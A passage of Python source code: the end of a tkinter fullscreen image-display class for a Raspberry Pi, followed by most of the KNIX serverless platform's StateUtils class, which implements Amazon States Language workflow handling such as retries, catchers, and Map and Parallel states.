privat method to dispaly window on pi in fullscreen
:return: -
"""
# Whatever buttons, etc
self.root = tk.Tk()
self.root.geometry('%dx%d+%d+%d' % (800, 480, 0, 0))
self.root.attributes('-alpha', 0.0) # For icon
self.root.lower()
self.root.iconify()
self.window = tk.Toplevel(self.root)
self.window.geometry("800x480") # Whatever size
self.window.overrideredirect(1) # Remove border
self.window.attributes('-topmost', 1)
self.photo = tk.PhotoImage(file=self.imgPath)
self.label = tk.Label(self.window, image=self.photo)
self.label.image = self.photo # keep a reference!
self.label.grid(row=3, column=1, padx=5, pady=5)
self.label.pack(fill=tk.BOTH, expand=1)
self.root.after(100, self.__change_picture_callback)
self.window.mainloop()
def __change_picture_callback(self):
"""
callback used to update the picture tk interal stuff
:return:
"""
self.photo = tk.PhotoImage(file=self.imgPath)
self.label.configure(image=self.photo)
self.image = self.photo
# reschedule event in 2 seconds
self.root.after(100, self.__change_picture_callback)
def __show_window(self):
"""
starts windows in different thread and waits for init
:return:
"""
self.t = Thread(target=self.__open_window)
self.t.start()
# time to start thread
time.sleep(2)
def change_picture(self, picture_path):
"""
method th change the picture by selecting gesture
:param gesture_path: string to new image
:return: -
"""
self.imgPath = picture_path
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
_instcnt = 0 # instance counter
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
#self._mapStateInfo = {}
#self.batchAlreadyLaunched = []
#self.currentMapInputMetadata = {} # initialise with empty dicts
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__= func.__name__
return helper
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if err in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
try:
#self._logger.debug("Current Function Type: " + self.functionstatetype)
#self._logger.debug("StateUtils: Input Path Dict: " + json.dumps(self.input_path_dict))
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
#t_start = time.time()
function_input = self.process_input_path(self.input_path_dict, function_input)
#t_end = time.time()
#timestr = "%.15f" % ((t_end-t_start)*1.0E9)
#self._logger.debug("Input Path Processing Time (ns): " + timestr)
#self._logger.debug("StateUtils: Processed Value: " + json.dumps(function_input))
return function_input
except Exception:
#self._logger.exception("Input path processing exception")
#sys.stdout.flush()
#os._exit(1)
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
raise Exception(error_type)
return function_output
#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParamters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# translated from Parallel
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
#assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
k_list = [total_branch_count]
counter_name_trigger_metadata = {"k-list": k_list, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["k_list"] = k_list
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
self._logger.debug("[StateUtils] evaluateMapState: ")
self._logger.debug("\t CounterName:" + CounterName)
self._logger.debug("\t counter_name_topic:" + counter_name_topic)
self._logger.debug("\t counter_name_key: " + counter_name_key)
self._logger.debug("\t counter_name_trigger_metadata:" + json.dumps(counter_name_trigger_metadata))
self._logger.debug("\t counter_name_value_metadata:" + json.dumps(counter_name_value_metadata))
self._logger.debug("\t counter_name_value_encoded: " + json.dumps(counter_name_value))
self._logger.debug("\t mapInfo_key:" + mapInfo_key)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
self._logger.debug("\t workflow_instance_metadata_storage_key: " + workflow_instance_metadata_storage_key)
#self._logger.debug("\t metadata " + json.dumps(metadata))
self._logger.debug("\t total_branch_count:" + str(total_branch_count))
self._logger.debug("\t branch_out_keys:" + ",".join(branch_out_keys))
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
#assert py3utils.is_string(workflow_instance_outputkeys_set_key)
# sapi.createSet(workflow_instance_outputkeys_set_key) # obsolete statement
# Now provide each branch with its own input
#branches = self.parsedfunctionstateinfo["Branches"]
branch = self.parsedfunctionstateinfo["Iterator"] # this is just onee set
#for branch in branches:
# lauch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
#self._mapStateInfo["mapStateInputValue"] = str(function_input[i])
#self._mapStateInfo["mapStateInputIndex"] = str(i)
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information abaout state results in buckets.
# It collects these results and returns metadata and post_map_output_results
#self._logger.debug("[StateUtils] evaluatePostMap: ")
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t function_input: " + str(function_input))
action = metadata["__state_action"]
assert action == "post_map_processing"
#counterValue = metadata["CounterValue"]
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
#self._logger.debug("[StateUtils] evaluatePostMap, metadata[state_counter]: " + str(metadata["state_counter"]))
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
#mapInfoKey = key + "_" + self.functionstatename + "_map_info"
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
k_list = mapInfo["k_list"]
self._logger.debug("\t action: " + action)
self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
self._logger.debug("\t k_list:" + str(k_list))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if k_list[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
#mapStatePartialResult = ast.literal_eval(self._mapStateInfo["mapStatePartialResult"])
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
#self._mapStateInfo["mapStatePartialResult"] = str(mapStatePartialResult)
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# if ast.literal_eval(self._mapStateInfo["mapInputCount"]) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
#res_raw = ast.literal_eval(self._mapStateInfo["mapStatePartialResult"])
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyResultPath(function_input_post_result, function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = [total_branch_count]
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
#self._logger.debug("[StateUtils] evaluateParallelState: ")
#self._logger.debug("\t CounterName:" + CounterName)
#self._logger.debug("\t CounterMetadata: " + json.dumps(counter_metadata))
#self._logger.debug("\t parallelInfo_key:" + parallelInfo_key)
#self._logger.debug("\t parallelInfo:" + json.dumps(parallelInfo))
#self._logger.debug("\t total_branch_count:" + str(total_branch_count))
#self._logger.debug("\t branch_out_keys:" + ",".join(branch_out_keys))
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
assert py3utils.is_string(workflow_instance_outputkeys_set_key)
sapi.createSet(workflow_instance_outputkeys_set_key)
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
#self._logger.debug("\t Branch StartAt:" + startat)
#self._logger.debug("\t Branch input:" + str(function_input))
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
